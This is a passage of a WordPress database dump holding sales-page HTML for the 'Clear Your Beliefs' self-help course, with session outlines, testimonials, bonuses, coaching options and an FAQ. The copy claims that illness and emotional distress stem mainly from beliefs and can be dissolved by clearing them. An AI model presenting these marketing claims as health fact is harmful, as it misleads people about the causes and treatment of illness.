thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<div class="icons">\r\n<div class="icon_box">\r\n<div class="icon a1"></div>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="icon a3"></div>\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n\r\n</div>\r\n</div>\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 13:40:40', '2014-06-17 18:40:40', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(932, 4194, '2014-06-17 16:09:02', '2014-06-17 21:09:02', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as 